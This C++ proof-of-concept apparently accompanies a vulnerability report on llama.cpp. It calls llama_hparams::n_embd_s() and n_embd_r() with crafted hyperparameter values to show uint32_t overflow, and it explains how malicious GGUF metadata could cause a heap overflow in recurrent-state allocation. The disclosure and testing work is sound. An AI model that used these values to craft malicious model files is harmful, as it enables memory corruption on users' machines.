/** * Empirical proof: uint32_t integer overflow in llama_hparams::n_embd_s() * * This test directly instantiates llama_hparams from llama.cpp and calls * n_embd_s() with overflow-inducing values, proving the overflow occurs * in the actual production code (not a simulation). * * Build: * cd llama.cpp * g++ -std=c++17 -I src -I include -I ggml/include \ * ../gguf_poc/test_hparams_overflow.cpp src/llama-hparams.cpp \ * -o ../gguf_poc/test_hparams_overflow * * Run: * ./test_hparams_overflow */ #include "llama-hparams.h" #include #include #include int main() { printf("================================================================\n"); printf("EMPIRICAL PROOF: uint32_t overflow in llama_hparams::n_embd_s()\n"); printf("================================================================\n\n"); // --- Test 1: Mamba path (ssm_d_state * ssm_d_inner) --- { printf("--- Test 1: Mamba path (line 169: return ssm_d_state * ssm_d_inner) ---\n"); llama_hparams hp = {}; memset(&hp, 0, sizeof(hp)); hp.n_layer = 1; // Set values that overflow when multiplied as uint32_t hp.ssm_d_state = 1073741825; // (2^30 + 1) hp.ssm_d_inner = 4; // Ensure we hit the Mamba path (wkv_head_size=0, n_embd_head_kda=0) hp.wkv_head_size = 0; hp.n_embd_head_kda = 0; uint32_t result = hp.n_embd_s(); // Correct value in 64-bit: 1073741825 * 4 = 4,294,967,300 uint64_t correct = (uint64_t)hp.ssm_d_state * hp.ssm_d_inner; printf(" ssm_d_state = %u\n", hp.ssm_d_state); printf(" ssm_d_inner = %u\n", hp.ssm_d_inner); printf(" n_embd_s() returned: %u\n", result); printf(" Correct value: %llu\n", (unsigned long long)correct); printf(" OVERFLOW: %llu -> %u (buffer is %llux too small!)\n", (unsigned long long)correct, result, (unsigned long long)(correct / result)); printf(" Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE"); } // --- Test 2: RWKV path (n_embd * wkv_head_size) --- { printf("--- Test 2: RWKV6 path (line 158: return n_embd * wkv_head_size) ---\n"); llama_hparams hp = {}; memset(&hp, 0, sizeof(hp)); hp.n_layer = 1; hp.n_embd = 65537; hp.wkv_head_size = 65537; uint32_t result = hp.n_embd_s(); uint64_t correct = (uint64_t)hp.n_embd * hp.wkv_head_size; printf(" n_embd = %u\n", hp.n_embd); printf(" wkv_head_size = %u\n", hp.wkv_head_size); printf(" n_embd_s() returned: %u\n", result); printf(" Correct value: %llu\n", (unsigned long long)correct); printf(" OVERFLOW: %llu -> %u (buffer is %llux too small!)\n", (unsigned long long)correct, result, (unsigned long long)(correct / result)); printf(" Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE"); } // --- Test 3: Kimi KDA path (n_embd_head_kda^2 * n_head) --- { printf("--- Test 3: Kimi KDA path (line 165: return n_embd_head_kda * n_embd_head_kda * n_head()) ---\n"); llama_hparams hp = {}; memset(&hp, 0, sizeof(hp)); hp.n_layer = 1; hp.wkv_head_size = 0; hp.n_embd_head_kda = 65536; // 65536^2 = 2^32, wraps to 0 // n_head() reads n_head_arr[0], must be set hp.n_head_arr[0] = 1; uint32_t result = hp.n_embd_s(); uint64_t correct = (uint64_t)hp.n_embd_head_kda * hp.n_embd_head_kda * hp.n_head_arr[0]; printf(" n_embd_head_kda = %u\n", hp.n_embd_head_kda); printf(" n_head = %u\n", hp.n_head_arr[0]); printf(" n_embd_s() returned: %u\n", result); printf(" Correct value: %llu\n", (unsigned long long)correct); if (result == 0) { printf(" OVERFLOW: wraps to ZERO! ggml_new_tensor_1d allocates 0 bytes!\n"); } else { printf(" OVERFLOW: %llu -> %u\n", (unsigned long long)correct, result); } printf(" Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE"); } // --- Test 4: n_embd_r() Mamba path --- { printf("--- Test 4: n_embd_r() Mamba path (line 152) ---\n"); llama_hparams hp = {}; memset(&hp, 0, sizeof(hp)); hp.n_layer = 1; hp.wkv_head_size = 0; hp.n_shortconv_l_cache = 0; hp.n_embd_head_kda = 0; hp.ssm_d_conv = 4; hp.ssm_d_inner = 4; hp.ssm_n_group = 1; hp.ssm_d_state = 715827883; // chosen so (d_conv-1)*(d_inner + 2*1*d_state) overflows uint32_t result = hp.n_embd_r(); // (4-1) * (4 + 2*1*715827883) = 3 * (4 + 1431655766) = 3 * 1431655770 = 4294967310 uint64_t sub = (uint64_t)hp.ssm_d_inner + 2ULL * hp.ssm_n_group * hp.ssm_d_state; uint64_t correct = ((uint64_t)hp.ssm_d_conv - 1) * sub; printf(" ssm_d_conv = %u\n", hp.ssm_d_conv); printf(" ssm_d_inner = %u\n", hp.ssm_d_inner); printf(" ssm_n_group = %u\n", hp.ssm_n_group); printf(" ssm_d_state = %u\n", hp.ssm_d_state); printf(" n_embd_r() returned: %u\n", result); printf(" Correct value: %llu\n", (unsigned long long)correct); printf(" Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE"); } // --- Test 5: Double overflow at allocation site --- { printf("--- Test 5: Double overflow simulation (allocation site lines 94-95) ---\n"); printf(" Code: hparams.n_embd_s() * mem_size\n"); printf(" Both are uint32_t, multiplication overflows before widening to int64_t\n\n"); uint32_t n_embd_s_val = 65536; // legitimate n_embd_s() return value uint32_t mem_size = 65537; // batch/sequence size uint32_t result = n_embd_s_val * mem_size; // uint32_t * uint32_t uint64_t correct = (uint64_t)n_embd_s_val * mem_size; printf(" n_embd_s() = %u\n", n_embd_s_val); printf(" mem_size = %u\n", mem_size); printf(" uint32 mul = %u\n", result); printf(" Correct mul = %llu\n", (unsigned long long)correct); printf(" Status: %s\n\n", result < correct ? "VULNERABLE (double overflow)" : "SAFE"); } printf("================================================================\n"); printf("CONCLUSION: All overflow paths in n_embd_s()/n_embd_r() are\n"); printf("confirmed vulnerable. An attacker crafting GGUF metadata with\n"); printf("these values causes undersized buffer allocation in\n"); printf("llama_memory_recurrent (lines 94-95), leading to heap overflow\n"); printf("when recurrent state data is written during inference.\n"); printf("================================================================\n"); return 0; }